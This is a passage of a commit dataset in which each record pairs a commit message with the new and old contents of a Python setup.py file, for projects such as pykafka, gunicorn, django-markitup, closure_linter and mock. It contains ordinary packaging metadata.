          'http://github.com/applegrew/django-select2@python3#egg=Django_Select2_Py3-4.2.1',
      ],
      # See http://pypi.python.org/pypi?%3Aaction=list_classifiers
      classifiers=[
          'Development Status :: 2 - Pre-Alpha',
          'Environment :: Web Environment',
          'Framework :: Django',
          'Intended Audience :: Developers',
          'License :: OSI Approved :: MIT License',
          'Operating System :: Unix',
          'Programming Language :: Python',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.3',
          'Programming Language :: Python :: 3.4',
          'Topic :: Software Development :: Libraries :: Application Frameworks']
      )
| Python | 0.000001 |
a79fcf2786df38f84b065ff579f83f03c1d5a20b | Add setup.py file | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
# Packaging metadata; find_packages() picks up every package directory
# next to this setup.py.
setup(
    name='django-cyclebufferfield',
    description="Field to manage Django fields in a fixed-size ring buffer.",
    version='0.1',
    url='http://code.playfire.com/',
    author='Playfire.com',
    author_email='tech@playfire.com',
    license='BSD',
    packages=find_packages(),
)
| Python | 0.000001 | |
5d6f52d2b89eda2aa070faafad2fd89eeaf599ec | add setup py | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
    name='selectel_cloud_api',
    version='1.0',
    packages=find_packages(),
    # Bug fix: install_requires was the bare string 'selectel_cloud_api',
    # i.e. this package declared a dependency on itself (and as a string
    # rather than a list of requirement specifiers).  No third-party
    # runtime dependency is declared here, so the list is empty.
    install_requires=[],
    url='https://github.com/RustoriaRu/SelectelCloudApi',
    license='MIT',
    author='vir-mir',
    keywords='selectel.ru selectel api, cloud',
    author_email='virmir49@gmail.com',
    description='api select cloud api',
    classifiers=[
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ]
)
| Python | 0 | |
ab3728405be94c071c353374735b97f207479c00 | Add setup.py to make an .exe with py2exe | setup.py | setup.py | #!/c/Anaconda/python
from distutils.core import setup
import py2exe
setup(console=["tmpr.py"])
| Python | 0.000001 | |
2e91c826a72e3f240f6d010678d68bab0bab5749 | Add setup.py for packaging | setup.py | setup.py | from setuptools import setup
from sirsi import __version__, __author__
# Version and author come from the sirsi package itself (imported above).
setup(
    name='sirsi',
    version=__version__,
    author=__author__,
    author_email='winston@ml1.net',
    description='Manage a sirsi enterprise-based library account',
    url='https://github.com/-winny/sirsi',
    license='MIT',
    packages=['sirsi'],
    # NOTE(review): argparse has shipped in the stdlib since Python 2.7,
    # so pinning it here drags in the old PyPI backport -- confirm it can
    # be dropped.  All pins are exact (==), which blocks bug-fix updates.
    install_requires=[
        'argparse==1.2.1',
        'beautifulsoup4==4.3.2',
        'mechanize==0.2.5',
        'python-dateutil==2.2',
        'tabulate==0.7.2',
    ],
)
| Python | 0 | |
76601be760f0aa15637f65164c5e595b218fc2b9 | Add setup.py | setup.py | setup.py | from setuptools import find_packages
from setuptools import setup
# Single source of truth for the release number.
VERSION = '0.0.1'
setup(
    name='gae-utils',
    version=VERSION,
    packages=find_packages(),
    # No runtime dependencies; package data is shipped, and the package
    # must be unzipped on install (zip_safe=False).
    install_requires=[],
    include_package_data=True,
    zip_safe=False,
    maintainer='Tyler Treat',
    maintainer_email='ttreat31@gmail.com'
)
| Python | 0.000001 | |
609bc6fbd1284c1b769c2e0548f6c65a97d144cd | Add initial attempt at a setup.py file | setup.py | setup.py | from setuptools import setup
import pygametemplate
# Version, description and author are pulled from the pygametemplate
# package itself (imported above), so they live in one place.
setup(
    name="pygametemplate",
    version=pygametemplate.__version__,
    description=pygametemplate.__doc__,
    url="https://github.com/AndyDeany/pygame-template",
    author=pygametemplate.__author__,
    author_email="oneandydean@hotmail.com",
    packages=["pygametemplate"]
)
| Python | 0.000001 | |
b5b503229789c61af5bb47d6bb587bafb2ada562 | Fix setup.py, bump version. | setup.py | setup.py | #!/usr/bin/env python
"""
# pykafka
pykafka allows you to produce messages to the Kafka distributed publish/subscribe messaging service.
## Requirements
You need to have access to your Kafka instance and be able to connect through
TCP. You can obtain a copy and instructions on how to setup kafka at
https://github.com/kafka-dev/kafka
## Installation
pip install pykafka
## Usage
### Sending a simple message
import kafka
producer = kafka.producer.Producer('test')
message = kafka.message.Message("Foo!")
producer.send(message)
### Sending a sequence of messages
import kafka
producer = kafka.producer.Producer('test')
message1 = kafka.message.Message("Foo!")
message2 = kafka.message.Message("Bar!")
producer.send([message1, message2])
### Batching a bunch of messages using a context manager.
import kafka
producer = kafka.producer.Producer('test')
with producer.batch() as messages:
print "Batching a send of multiple messages.."
        messages.append(kafka.message.Message("first message to send"))
        messages.append(kafka.message.Message("second message to send"))
* they will be sent all at once, after the context manager execution.
### Consuming messages one by one
import kafka
consumer = kafka.consumer.Consumer('test')
messages = consumer.consume()
### Consuming messages using a generator loop
import kafka
consumer = kafka.consumer.Consumer('test')
for message in consumer.loop():
print message
Contact:
Please use the GitHub issues: https://github.com/dsully/pykafka/issues
* Inspiried from Alejandro Crosa's kafka-rb: https://github.com/acrosa/kafka-rb
"""
import setuptools
# Don't install deps for development mode.
setuptools.bootstrap_install_from = None
setuptools.setup(
name = 'pykafka',
version = '0.1.1',
license = 'MIT',
long_description = __doc__,
author = "Dan Sully",
author_email = "dsully@gmail.com",
url = 'http://github.com/dsully/pykafka',
platforms = 'any',
# What are we packaging up?
packages = setuptools.find_packages('kafka'),
zip_safe = True,
verbose = False,
)
| #!/usr/bin/env python
"""
# pykafka
pykafka allows you to produce messages to the Kafka distributed publish/subscribe messaging service.
## Requirements
You need to have access to your Kafka instance and be able to connect through
TCP. You can obtain a copy and instructions on how to setup kafka at
https://github.com/kafka-dev/kafka
## Installation
pip install pykafka
## Usage
### Sending a simple message
import kafka
producer = kafka.producer.Producer('test')
message = kafka.message.Message("Foo!")
producer.send(message)
### Sending a sequence of messages
import kafka
producer = kafka.producer.Producer('test')
message1 = kafka.message.Message("Foo!")
message2 = kafka.message.Message("Bar!")
producer.send([message1, message2])
### Batching a bunch of messages using a context manager.
import kafka
producer = kafka.producer.Producer('test')
with producer.batch() as messages:
print "Batching a send of multiple messages.."
messages.append(kafka.message.Message("first message to send")
messages.append(kafka.message.Message("second message to send")
* they will be sent all at once, after the context manager execution.
### Consuming messages one by one
import kafka
consumer = kafka.consumer.Consumer('test')
messages = consumer.consume()
### Consuming messages using a generator loop
import kafka
consumer = kafka.consumer.Consumer('test')
for message in consumer.loop():
print message
Contact:
Please use the GitHub issues: https://github.com/dsully/pykafka/issues
* Inspiried from Alejandro Crosa's kafka-rb: https://github.com/acrosa/kafka-rb
"""
import setuptools
# Don't install deps for development mode.
setuptools.bootstrap_install_from = None
setuptools.setup(
name = 'pykafka',
version = '0.1',
license = 'MIT',
long_description = __doc__
author = "Dan Sully",
author_email = "dsully@gmail.com",
url = 'http://github.com/dsully/pykafka',
platforms = 'any',
# What are we packaging up?
packages = setuptools.find_packages('kafka'),
zip_safe = True,
verbose = False,
)
| Python | 0 |
a1e35b73b5e10a885e78e965242c5b1b6e92aa16 | Add a setup.py file | setup.py | setup.py | from setuptools import setup
setup(
name='wellknown',
version='0.1dev',
packages=['wellknown']
)
| Python | 0.000002 | |
65ecc0145406e7d8e20a281c0e5c04b26208646d | Add a setup.py file. | setup.py | setup.py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'name': 'ultracold-ions',
'description': 'A library for the simulation of ultracold neutral plasmas.',
'author': 'Tech-X Corporation',
'url': 'https://github.com/Tech-XCorp/ultracold-ions',
'download_url': 'https://github.com/Tech-XCorp/ultracold-ions',
'author_email': 'dmeiser@txcorp.com',
'version': '0.1',
'install_requires': ['numpy','pyopencl','nose'],
'packages': ['uci'],
'scripts': []
}
setup(**config)
| Python | 0 | |
d9d3ae4a1d4007a0aa1dafe09102cb7414c338db | Remove extracting HG revision from setup.py. | setup.py | setup.py | from setuptools import setup
long_description = (open('README.rst').read() +
open('CHANGES.rst').read() +
open('TODO.rst').read())
def _static_files(prefix):
return [prefix+'/'+pattern for pattern in [
'markitup/*.*',
'markitup/sets/*/*.*',
'markitup/sets/*/images/*.png',
'markitup/skins/*/*.*',
'markitup/skins/*/images/*.png',
'markitup/templates/*.*'
]]
setup(
name='django-markitup',
version='2.2.2.post0',
description='Markup handling for Django using the MarkItUp! universal markup editor',
long_description=long_description,
author='Carl Meyer',
author_email='carl@oddbird.net',
url='http://bitbucket.org/carljm/django-markitup/',
packages=['markitup', 'markitup.templatetags'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Framework :: Django',
],
zip_safe=False,
test_suite='runtests.runtests',
tests_require='Django>=1.3',
package_data={'markitup': ['templates/markitup/*.html'] +
_static_files('static')}
)
| from setuptools import setup
import subprocess
import os.path
try:
# don't get confused if our sdist is unzipped in a subdir of some
# other hg repo
if os.path.isdir('.hg'):
p = subprocess.Popen(['hg', 'parents', r'--template={rev}\n'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if not p.returncode:
fh = open('HGREV', 'wb')
fh.write(p.communicate()[0].splitlines()[0])
fh.close()
except (OSError, IndexError):
pass
try:
hgrev = open('HGREV').read()
except IOError:
hgrev = ''
long_description = (open('README.rst').read() +
open('CHANGES.rst').read() +
open('TODO.rst').read())
def _static_files(prefix):
return [prefix+'/'+pattern for pattern in [
'markitup/*.*',
'markitup/sets/*/*.*',
'markitup/sets/*/images/*.png',
'markitup/skins/*/*.*',
'markitup/skins/*/images/*.png',
'markitup/templates/*.*'
]]
setup(
name='django-markitup',
version='2.2.2.post%s' % hgrev,
description='Markup handling for Django using the MarkItUp! universal markup editor',
long_description=long_description,
author='Carl Meyer',
author_email='carl@oddbird.net',
url='http://bitbucket.org/carljm/django-markitup/',
packages=['markitup', 'markitup.templatetags'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Framework :: Django',
],
zip_safe=False,
test_suite='runtests.runtests',
tests_require='Django>=1.3',
package_data={'markitup': ['templates/markitup/*.html'] +
_static_files('static')}
)
| Python | 0 |
b82dee62e325d83f8aeaede406de24973ee42b42 | Update project url in setup.py | setup.py | setup.py | #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='closure_linter',
version='2.3.17',
description='Closure Linter',
license='Apache',
author='The Closure Linter Authors',
author_email='opensource@google.com',
url='https://github.com/google/closure-linter',
install_requires=['python-gflags'],
package_dir={'closure_linter': 'closure_linter'},
packages=['closure_linter', 'closure_linter.common'],
entry_points = {
'console_scripts': [
'gjslint = closure_linter.gjslint:main',
'fixjsstyle = closure_linter.fixjsstyle:main'
]
}
)
| #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='closure_linter',
version='2.3.17',
description='Closure Linter',
license='Apache',
author='The Closure Linter Authors',
author_email='opensource@google.com',
url='http://code.google.com/p/closure-linter',
install_requires=['python-gflags'],
package_dir={'closure_linter': 'closure_linter'},
packages=['closure_linter', 'closure_linter.common'],
entry_points = {
'console_scripts': [
'gjslint = closure_linter.gjslint:main',
'fixjsstyle = closure_linter.fixjsstyle:main'
]
}
)
| Python | 0 |
45a7a979d687b75851d3901171b826faa965389e | Add setup script | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
setup(name='ambra',
version='0.1dev',
description='Temporal prediction by pairwise comparisons',
packages=['ambra'],
)
| Python | 0.000001 | |
20a5ccf55c9292d3c360a34d190e583b84594a37 | Add zeeman energy tests. | pyoommf/test_zeeman.py | pyoommf/test_zeeman.py | from zeeman import Zeeman
def test_zeeman_mif():
H = (0.1, -0.5, -8.9e6)
zeeman = Zeeman(H)
mif_string = zeeman.get_mif()
lines = mif_string.split('\n')
assert 'Specify Oxs_FixedZeeman {' in lines[0]
assert '{ Oxs_UniformVectorField {' in lines[1]
assert 'vector' in lines[2]
line2 = lines[2].split()
assert float(line2[1][1:]) == H[0]
assert float(line2[2]) == H[1]
assert float(line2[3][0:-1]) == H[2]
def test_zeeman_formatting():
H = (0.1, -0.5, -8.9e6)
zeeman = Zeeman(H)
mif_string = zeeman.get_mif()
assert mif_string[0] == 'S'
assert mif_string[-1] == '\n'
assert mif_string[-2] == '\n'
| Python | 0 | |
331aecb334f4e4ff4c38b4a2b12d3a80d7327de1 | Remove unused URL from setup.py | setup.py | setup.py | #! /usr/bin/python
# Copyright (C) 2007-2010 Michael Foord & the mock team
# E-mail: fuzzyman AT voidspace DOT org DOT uk
# http://www.voidspace.org.uk/python/mock/
from mock import __version__
from distutils.core import setup
import os
NAME = 'mock'
MODULES = ['mock']
DESCRIPTION = 'A Python Mocking and Patching Library for Testing'
URL = "http://www.voidspace.org.uk/python/mock/"
readme = os.path.join(os.path.dirname(__file__), 'README.txt')
LONG_DESCRIPTION = open(readme).read()
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing',
]
AUTHOR = 'Michael Foord'
AUTHOR_EMAIL = 'michael@voidspace.org.uk'
KEYWORDS = "testing test mock mocking unittest patching stubs fakes doubles".split(' ')
setup(
name=NAME,
version=__version__,
py_modules=MODULES,
# metadata for upload to PyPI
author=AUTHOR,
author_email=AUTHOR_EMAIL,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
keywords=KEYWORDS,
url=URL,
classifiers=CLASSIFIERS,
) | #! /usr/bin/python
# Copyright (C) 2007-2010 Michael Foord & the mock team
# E-mail: fuzzyman AT voidspace DOT org DOT uk
# http://www.voidspace.org.uk/python/mock/
from mock import __version__
from distutils.core import setup
import os
NAME = 'mock'
MODULES = ['mock']
DESCRIPTION = 'A Python Mocking and Patching Library for Testing'
URL = "http://www.voidspace.org.uk/python/mock/"
'http://www.voidspace.org.uk/downloads/mock-%s.zip' % __version__
readme = os.path.join(os.path.dirname(__file__), 'README.txt')
LONG_DESCRIPTION = open(readme).read()
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing',
]
AUTHOR = 'Michael Foord'
AUTHOR_EMAIL = 'michael@voidspace.org.uk'
KEYWORDS = "testing test mock mocking unittest patching stubs fakes doubles".split(' ')
setup(
name=NAME,
version=__version__,
py_modules=MODULES,
# metadata for upload to PyPI
author=AUTHOR,
author_email=AUTHOR_EMAIL,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
keywords=KEYWORDS,
url=URL,
classifiers=CLASSIFIERS,
) | Python | 0.000001 |
98b2114199b04678cd41e25deb9a3478e0f76e45 | say hello to python 3.3 | setup.py | setup.py | # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import os
from setuptools import setup, find_packages, Command
import sys
from gunicorn import __version__
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Topic :: Internet',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Server',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content']
# read long description
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as f:
long_description = f.read()
# read dev requirements
fname = os.path.join(os.path.dirname(__file__), 'requirements_dev.txt')
with open(fname) as f:
tests_require = list(map(lambda l: l.strip(), f.readlines()))
class PyTest(Command):
user_options = [
("cov", None, "measure coverage")
]
def initialize_options(self):
self.cov = None
def finalize_options(self):
pass
def run(self):
import sys,subprocess
basecmd = [sys.executable, '-m', 'py.test']
if self.cov:
basecmd += ['--cov', 'gunicorn']
errno = subprocess.call(basecmd + ['tests'])
raise SystemExit(errno)
setup(
name = 'gunicorn',
version = __version__,
description = 'WSGI HTTP Server for UNIX',
long_description = long_description,
author = 'Benoit Chesneau',
author_email = 'benoitc@e-engura.com',
license = 'MIT',
url = 'http://gunicorn.org',
classifiers = CLASSIFIERS,
zip_safe = False,
packages = find_packages(exclude=['examples', 'tests']),
include_package_data = True,
tests_require = tests_require,
cmdclass = {'test': PyTest},
entry_points="""
[console_scripts]
gunicorn=gunicorn.app.wsgiapp:run
gunicorn_django=gunicorn.app.djangoapp:run
gunicorn_paster=gunicorn.app.pasterapp:run
[gunicorn.workers]
sync=gunicorn.workers.sync:SyncWorker
eventlet=gunicorn.workers.geventlet:EventletWorker
gevent=gunicorn.workers.ggevent:GeventWorker
gevent_wsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
gevent_pywsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
tornado=gunicorn.workers.gtornado:TornadoWorker
[gunicorn.loggers]
simple=gunicorn.glogging:Logger
[paste.server_runner]
main=gunicorn.app.pasterapp:paste_server
"""
)
| # -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import os
from setuptools import setup, find_packages, Command
import sys
from gunicorn import __version__
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Server',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content']
# read long description
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as f:
long_description = f.read()
# read dev requirements
fname = os.path.join(os.path.dirname(__file__), 'requirements_dev.txt')
with open(fname) as f:
tests_require = list(map(lambda l: l.strip(), f.readlines()))
class PyTest(Command):
user_options = [
("cov", None, "measure coverage")
]
def initialize_options(self):
self.cov = None
def finalize_options(self):
pass
def run(self):
import sys,subprocess
basecmd = [sys.executable, '-m', 'py.test']
if self.cov:
basecmd += ['--cov', 'gunicorn']
errno = subprocess.call(basecmd + ['tests'])
raise SystemExit(errno)
setup(
name = 'gunicorn',
version = __version__,
description = 'WSGI HTTP Server for UNIX',
long_description = long_description,
author = 'Benoit Chesneau',
author_email = 'benoitc@e-engura.com',
license = 'MIT',
url = 'http://gunicorn.org',
classifiers = CLASSIFIERS,
zip_safe = False,
packages = find_packages(exclude=['examples', 'tests']),
include_package_data = True,
tests_require = tests_require,
cmdclass = {'test': PyTest},
entry_points="""
[console_scripts]
gunicorn=gunicorn.app.wsgiapp:run
gunicorn_django=gunicorn.app.djangoapp:run
gunicorn_paster=gunicorn.app.pasterapp:run
[gunicorn.workers]
sync=gunicorn.workers.sync:SyncWorker
eventlet=gunicorn.workers.geventlet:EventletWorker
gevent=gunicorn.workers.ggevent:GeventWorker
gevent_wsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
gevent_pywsgi=gunicorn.workers.ggevent:GeventPyWSGIWorker
tornado=gunicorn.workers.gtornado:TornadoWorker
[gunicorn.loggers]
simple=gunicorn.glogging:Logger
[paste.server_runner]
main=gunicorn.app.pasterapp:paste_server
"""
)
| Python | 0.999756 |
d00f9fd43cfc45747a9479f00db5d67fda658e55 | Add initial distutils configuration | setup.py | setup.py | # Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""distutils configuration."""
__author__ = 'tstromberg@google.com (Thomas Stromberg)'
from namebench import VERSION
from distutils.core import setup
setup(name='namebench',
version=VERSION,
py_modules=['namebench'],
description='DNS service benchmarking tool',
author='Thomas Stromberg',
author_email='tstromberg@google.com',
url='http://namebench.googlecode.com/',
packages=('libnamebench',),
platforms=('Any',),
requires=['graphy', 'dnspython', 'jinja2'],
license='Apache 2.0',
scripts=['namebench.py'],
package_data = {'libnamebench': ['data/alexa-top-10000-global.txt',
'templates/ascii.tmpl',
'templates/html.tmpl',
'namebench.cfg']},
# package_data=[('data', ['data/alexa-top-10000-global.txt']),
# ('templates', ['templates/ascii.tmpl',
# 'templates/html.tmpl']),
# ('config', ['namebench.cfg'])]
)
| Python | 0.000001 | |
8439263d6ff66e659a8051d3efc0475020048629 | update v.# make tag and set to release | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (C) 2013-2014 முத்தையா அண்ணாமலை
# open-tamil project
from distutils.core import setup
from codecs import open
setup(name='Open-Tamil',
version='0.2.8',
description='Tamil language text processing tools',
author='M. Annamalai, T. Arulalan,',
author_email='ezhillang@gmail.com',
url='https://github.com/arcturusannamalai/open-tamil',
packages=['tamil','transliterate','ngram'],
license='GPLv3',
platforms='PC,Linux,Mac',
classifiers='Natural Language :: Tamil',
long_description=open('README.md','r','UTF-8').read(),
download_url='https://github.com/arcturusannamalai/open-tamil/archive/latest.zip',#pip
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# (C) 2013-2014 முத்தையா அண்ணாமலை
# open-tamil project
from distutils.core import setup
from codecs import open
setup(name='Open-Tamil',
version='0.2.4',
description='Tamil language text processing tools',
author='Muthiah Annamalai',
author_email='ezhillang@gmail.com',
url='https://github.com/arcturusannamalai/open-tamil',
packages=['tamil','transliterate','ngram'],
license='GPLv3',
platforms='PC,Linux,Mac',
classifiers='Natural Language :: Tamil',
long_description=open('README.md','r','UTF-8').read(),
download_url='https://github.com/arcturusannamalai/open-tamil/archive/latest.zip',#pip
)
| Python | 0 |
c75ee6a0ee2f542463b5ca8cb81b06a6a6650d4c | Add initial setup file | setup.py | setup.py | from setuptools import setup
setup(
name='python2-consul',
packages=['python2-consul'],
version='0.0.1',
install_requires=[
'certifi==2017.4.17',
'chardet==3.0.4',
'idna==2.5',
'PyYAML==3.12',
'requests==2.18.1',
'urllib3==1.21.1',
'validators==0.12.0',
'pytest==3.2.2'
]
)
| Python | 0.000001 | |
af2effaf147b8e473f7b9c655842617a91414278 | Upgrade the requirement on taskotron-python-versions to include latest changes in shared functions | setup.py | setup.py |
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
super().finalize_options()
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
requires = [
'sqlalchemy >= 1.0, < 2.0',
'PyYAML >= 3.11, < 4.0',
'click >= 3.3, < 7.0',
'flask >= 0.10, < 1.0',
'markdown >= 2.4, < 3.0',
'dogpile.cache >= 0.5.5, < 1.0',
'taskotron-python-versions >= 0.1.dev2',
]
tests_require = ['pytest']
setup_args = dict(
name='portingdb',
version='0.1',
packages=['portingdb'],
url='https://github.com/fedora-python/portingdb',
description="""Database of packages that need Python 3 porting""",
author='Petr Viktorin',
author_email='pviktori@redhat.com',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
install_requires=requires,
tests_require=tests_require,
cmdclass={'test': PyTest},
)
if __name__ == '__main__':
setup(**setup_args)
|
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
super().finalize_options()
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
requires = [
'sqlalchemy >= 1.0, < 2.0',
'PyYAML >= 3.11, < 4.0',
'click >= 3.3, < 7.0',
'flask >= 0.10, < 1.0',
'markdown >= 2.4, < 3.0',
'dogpile.cache >= 0.5.5, < 1.0',
'taskotron-python-versions',
]
tests_require = ['pytest']
setup_args = dict(
name='portingdb',
version='0.1',
packages=['portingdb'],
url='https://github.com/fedora-python/portingdb',
description="""Database of packages that need Python 3 porting""",
author='Petr Viktorin',
author_email='pviktori@redhat.com',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
install_requires=requires,
tests_require=tests_require,
cmdclass={'test': PyTest},
)
if __name__ == '__main__':
setup(**setup_args)
| Python | 0 |
47b2e9890a0f3022ffbbf83a6e722b2e77e3443b | Fix dajax setup.py | setup.py | setup.py | from distutils.core import setup
setup(
name='django-dajax',
version='0.9',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description=('Easy to use library to create asynchronous presentation '
'logic with django and dajaxice'),
url='http://dajaxproject.com',
license='BSD',
packages=['dajax'],
package_data={'dajax': ['static/dajax/*']},
long_description=('dajax is a powerful tool to easily and super-quickly '
'develop asynchronous presentation logic in web '
'applications using python and almost no JS code. It '
'supports up to four of the most popular JS frameworks: '
'jQuery, Prototype, Dojo and mootols.'),
install_requires=[
'django-dajaxice>=0.5'
],
classifiers=['Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities']
)
| from distutils.core import setup
setup(
name='django-dajax',
version='0.9',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description=('Easy to use library to create asynchronous presentation '
'logic with django and dajaxice'),
url='http://dajaxproject.com',
license='BSD',
packages=['dajax'],
package_data={'dajax': ['static/*']},
long_description=('dajax is a powerful tool to easily and super-quickly '
'develop asynchronous presentation logic in web '
'applications using python and almost no JS code. It '
'supports up to four of the most popular JS frameworks: '
'jQuery, Prototype, Dojo and mootols.'),
install_requires=[
'django-dajaxice>=0.5'
],
classifiers=['Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities']
)
| Python | 0.000003 |
330650e7fe7c1a9aa0178812d08af332e927fe98 | add minimal setup.py | setup.py | setup.py | from setuptools import setup
setup(name='Cohorte Micronode',
version='0.9',
description='Cohorte Micronode Repository',
url='https://github.com/librallu/cohorte-herald',
author='Luc Libralesso',
author_email='libralesso.l@gmail.com',
license='Apache License 2.0',
packages=[],
zip_safe=False)
| Python | 0.000001 | |
